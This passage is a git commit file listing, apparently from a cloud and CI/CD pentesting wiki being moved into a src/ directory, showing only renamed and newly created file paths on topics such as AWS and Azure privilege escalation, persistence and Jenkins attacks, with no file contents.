{.gitbook/assets => src/images}/image (95).png (100%) rename {.gitbook/assets => src/images}/image (96).png (100%) rename {.gitbook/assets => src/images}/image (97).png (100%) rename {.gitbook/assets => 
src/images}/image (98).png (100%) rename {.gitbook/assets => src/images}/image (99).png (100%) rename {.gitbook/assets => src/images}/image.png (100%) rename {.gitbook/assets => src/images}/openshift-missing-service-account-image1.png (100%) rename {.gitbook/assets => src/images}/openshift-missing-service-account-image2.png (100%) create mode 100644 src/images/sponsor_8ksec.png create mode 100644 src/images/sponsor_hackenproof.jpeg create mode 100644 src/images/sponsor_intigriti.png create mode 100644 src/images/sponsor_pentesttools.webp create mode 100644 src/images/sponsor_rootedcon.png create mode 100644 src/images/sponsor_stm.png create mode 100644 src/images/sponsor_trickest.jpeg rename {.gitbook/assets => src/images}/telegram-cloud-document-4-5875069018120918586.jpg (100%) rename {.gitbook/assets => src/images}/telegram-cloud-photo-size-4-5780773316536156543-x.jpg (100%) rename {.gitbook/assets => src/images}/telegram-cloud-photo-size-4-5782633230648853886-y.jpg (100%) rename {.gitbook/assets => src/images}/telegram-cloud-photo-size-4-5920521132757336440-y.jpg (100%) rename {.gitbook/assets => src/images}/telegram-cloud-photo-size-4-6044191430395675441-x.jpg (100%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/ansible-tower-awx-automation-controller-security.md (51%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/apache-airflow-security/README.md (69%) create mode 100644 src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/apache-airflow-security/airflow-rbac.md (68%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/atlantis-security.md (69%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/circleci-security.md (59%) create mode 100644 src/pentesting-ci-cd/cloudflare-security/README.md create mode 100644 src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md create mode 100644 src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md create mode 100644 
src/pentesting-ci-cd/concourse-security/README.md create mode 100644 src/pentesting-ci-cd/concourse-security/concourse-architecture.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/concourse-security/concourse-enumeration-and-attacks.md (66%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/concourse-security/concourse-lab-creation.md (53%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/gitea-security/README.md (58%) create mode 100644 src/pentesting-ci-cd/gitea-security/basic-gitea-information.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/README.md (62%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/abusing-github-actions/README.md (65%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md (100%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/abusing-github-actions/gh-actions-cache-poisoning.md (100%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/abusing-github-actions/gh-actions-context-script-injections.md (100%) create mode 100644 src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/basic-github-information.md (62%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/jenkins-security/README.md (68%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/jenkins-security/basic-jenkins-information.md (63%) create mode 100644 src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/jenkins-security/jenkins-dumping-secrets-from-groovy.md (52%) create mode 100644 src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md create mode 100644 src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md create mode 100644 src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md rename 
{pentesting-ci-cd => src/pentesting-ci-cd}/okta-security/README.md (66%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/okta-security/okta-hardening.md (73%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/pentesting-ci-cd-methodology.md (55%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/serverless.com-security.md (64%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/supabase-security.md (62%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/terraform-security.md (72%) create mode 100644 src/pentesting-ci-cd/todo.md create mode 100644 src/pentesting-ci-cd/travisci-security/README.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/travisci-security/basic-travisci-information.md (60%) create mode 100644 src/pentesting-ci-cd/vercel-security.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/README.md (64%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-basic-information/README.md (78%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-basic-information/aws-federation-abuse.md (53%) create mode 100644 src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-persistence/README.md (100%) create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-persistence/aws-ecs-persistence.md (50%) create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md rename {pentesting-cloud => 
src/pentesting-cloud}/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md (51%) create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md (65%) create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-persistence/aws-ssm-perssitence.md (100%) create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-persistence/aws-sts-persistence.md (65%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/README.md (100%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md (66%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md create 
mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md (56%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md (74%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md (76%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md (60%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md (55%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md (50%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md create mode 100644 
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md (55%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md (51%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md (52%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md (55%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md (54%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md rename 
{pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md (70%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-cognito-privesc.md (82%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-ec2-privesc.md (77%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-ecs-privesc.md (75%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-efs-privesc.md (56%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md (54%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md rename {pentesting-cloud => 
src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-glue-privesc.md (60%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-iam-privesc.md (69%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-lambda-privesc.md (77%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md (60%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-rds-privesc.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-s3-privesc.md (63%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md (54%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-ssm-privesc.md (60%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md (59%) rename {pentesting-cloud => 
src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md (71%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md (79%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/README.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-api-gateway-enum.md (71%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md (51%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-cloudhsm-enum.md (78%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md (63%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md (70%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md (57%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-directory-services-workdocs-enum.md (59%) create mode 100644 
src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-dynamodb-enum.md (60%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md (68%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md (76%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md (63%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-efs-enum.md (51%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-elastic-beanstalk-enum.md (57%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-iam-enum.md (66%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-lambda-enum.md (69%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-msk-enum.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md create mode 100644 
src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-redshift-enum.md (70%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-relational-database-rds-enum.md (53%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md (69%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/README.md (100%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md (66%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md (77%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md (81%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md (60%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md (75%) create mode 100644 
src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md (73%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-ses-enum.md (61%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-stepfunctions-enum.md (56%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md (51%) create mode 100644 
src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md (50%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md create mode 100644 
src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md (68%) create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/README.md (68%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-basic-information/README.md (65%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-basic-information/az-tokens-and-public-applications.md (62%) create mode 100644 src/pentesting-cloud/azure-security/az-device-registration.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-enumeration-tools.md (68%) create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md (63%) create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md create mode 100644 
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md (59%) create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md (66%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md (60%) create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md (61%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md (63%) create mode 100644 src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-persistence/README.md (53%) create mode 100644 src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md create mode 100644 src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md create mode 100644 src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/README.md (100%) create mode 100644 
src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md (57%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/az-queue-post-exploitation.md (59%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md (68%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/az-sql-post-exploitation.md (62%) create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md (61%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/README.md (100%) create mode 100644 src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-authorization-privesc.md (52%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-entraid-privesc/README.md (73%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md (67%) create mode 100644 src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-functions-app-privesc.md (79%) create mode 100644 
